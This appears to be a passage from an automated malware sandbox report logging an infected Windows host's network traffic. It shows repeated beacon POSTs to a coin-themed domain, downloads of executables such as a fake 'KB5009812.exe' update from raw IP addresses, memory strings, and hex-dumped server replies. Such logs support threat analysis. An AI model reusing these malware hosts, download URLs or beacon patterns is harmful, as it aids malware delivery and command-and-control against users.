                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://crnelkeerw.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 116Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lyxrabhsyj.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 162Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dvrkmsgph.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 311Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bdwjscwkyb.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 111Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://laegissbnw.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 314Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pmulpwtk.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 152Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: GET /files/6961_1642089187_2359.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vgfuhgdk.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 240Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gjmsrnrg.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 312Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hffekwpew.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 343Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nrofkgudk.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 240Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ldeax.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 254Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mvdnpk.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 217Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uaeudvuct.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 208Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tfmwuwhaf.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 180Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: GET /l3.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 81.163.30.181
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bjmmoxjkh.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 200Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uekxwe.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 207Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: GET /book/KB5009812.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 74.201.28.62
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ybthjouy.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 175Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qycehx.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 137Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://udwhex.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 294Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hriqvkh.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 155Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rajclxd.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 247Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: GET /files/6961_1642089187_2359.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rkgofw.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 260Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://cmhrt.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 248Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: GET /files/7729_1642101604_1835.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rdctx.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 307Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hqdkqcs.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 341Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: GET /l2.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 81.163.30.181
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://cfyeur.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 321Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lwqbhm.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 325Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://podwtxiqj.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 259Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kxheih.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 114Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ahptoxawd.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 125Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ruiwhjpxrd.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 253Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ukonhqmwew.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 268Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qmeixpxj.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 268Host: host-data-coin-11.com
                      Source: global trafficTCP traffic: 192.168.2.4:49803 -> 185.7.214.171:8080
                      Source: global trafficTCP traffic: 192.168.2.4:49892 -> 86.107.197.138:38133
                      Source: global trafficTCP traffic: 192.168.2.4:49955 -> 74.201.28.62:5586
                      Source: global trafficTCP traffic: 192.168.2.4:49828 -> 104.47.53.36:25
                      Source: WerFault.exe, 00000010.00000002.806997904.0000000004960000.00000004.00000001.sdmp, svchost.exe, 00000018.00000002.819352356.000002A079500000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: svchost.exe, 00000018.00000002.819053495.000002A078CEE000.00000004.00000001.sdmpString found in binary or memory: http://crl.ver)
                      Source: svchost.exe, 00000018.00000003.793604569.000002A07957B000.00000004.00000001.sdmpString found in binary or memory: http://help.disneyplus.com.
                      Source: 3D34.exe, 00000012.00000002.833275323.00000000041F1000.00000004.00000001.sdmp, 3D34.exe, 00000012.00000002.833464312.0000000004361000.00000004.00000001.sdmpString found in binary or memory: https://api.ip.sb/ip
                      Source: svchost.exe, 00000018.00000003.793604569.000002A07957B000.00000004.00000001.sdmpString found in binary or memory: https://disneyplus.com/legal.
                      Source: svchost.exe, 00000018.00000003.793604569.000002A07957B000.00000004.00000001.sdmpString found in binary or memory: https://www.disneyplus.com/legal/privacy-policy
                      Source: svchost.exe, 00000018.00000003.793604569.000002A07957B000.00000004.00000001.sdmpString found in binary or memory: https://www.disneyplus.com/legal/your-california-privacy-rights
                      Source: svchost.exe, 00000018.00000003.794998457.000002A0795CA000.00000004.00000001.sdmp, svchost.exe, 00000018.00000003.795071055.000002A0795B3000.00000004.00000001.sdmp, svchost.exe, 00000018.00000003.795037619.000002A079592000.00000004.00000001.sdmp, svchost.exe, 00000018.00000003.795102955.000002A079A02000.00000004.00000001.sdmp, svchost.exe, 00000018.00000003.794951368.000002A0795CA000.00000004.00000001.sdmpString found in binary or memory: https://www.tiktok.com/legal/report/feedback
                      Source: unknownDNS traffic detected: queries for: host-data-coin-11.com
                      Source: C:\Users\user\AppData\Local\Temp\CCB2.exeCode function: 15_2_00404BE0 GetProcessHeap,RtlAllocateHeap,InternetOpenA,InternetSetOptionA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,InternetConnectA,InternetConnectA,HttpOpenRequestA,HttpOpenRequestA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrlen,GetProcessHeap,RtlAllocateHeap,lstrlen,memcpy,lstrlen,memcpy,lstrlen,lstrlen,memcpy,lstrlen,HttpSendRequestA,HttpQueryInfoA,StrCmpCA,Sleep,InternetReadFile,lstrcat,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,
                      Source: global trafficHTTP traffic detected: GET /files/9030_1641816409_7037.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                      Source: global trafficHTTP traffic detected: GET /install5.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: unicupload.top
                      Source: global trafficHTTP traffic detected: GET /game.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                      Source: global trafficHTTP traffic detected: GET /6.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 185.7.214.171:8080
                      Source: global trafficHTTP traffic detected: GET /files/6961_1642089187_2359.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                      Source: global trafficHTTP traffic detected: GET /l3.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 81.163.30.181
                      Source: global trafficHTTP traffic detected: GET /book/KB5009812.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 74.201.28.62
                      Source: global trafficHTTP traffic detected: GET /book/KB5009812.png HTTP/1.1Host: 74.201.28.62Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /capibar HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Host: 185.163.204.22
                      Source: global trafficHTTP traffic detected: GET //l/f/RGwRWn4BZ2GIX1a3oIgO/6bf5d5b41363c3e6b44705458de7ee6f935456db HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 185.163.204.24
                      Source: global trafficHTTP traffic detected: GET /files/6961_1642089187_2359.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                      Source: global trafficHTTP traffic detected: GET /files/7729_1642101604_1835.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                      Source: global trafficHTTP traffic detected: GET /l2.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 81.163.30.181
                      Source: global trafficHTTP traffic detected: GET //l/f/RGwRWn4BZ2GIX1a3oIgO/7e7a36a98c7545dda4f314e30bbcbe9a8ba64652 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 185.163.204.24
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49890 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49941
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49945 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49937 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49938
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49937
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49954
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49876
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49930
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49952
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49923 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49952 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49954 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49890
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49876 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49938 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49941 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49923
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49945
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:29:10 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 0d 0a 14 00 00 00 7b fa f5 1e b5 69 2b 2c 47 fa 0e a8 c1 82 9f 4f 1a c4 da 16 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 19{i+,GO0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:29:10 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:29:10 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:29:11 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:29:11 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 64 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 90 df 13 49 3a 4a a6 e8 dd e6 f8 5f f5 4a 88 2d a0 57 53 98 00 e5 a7 2c f8 2f 0d 0a 30 0d 0a 0d 0a Data Ascii: 2dI:82OI:J_J-WS,/0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:29:12 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 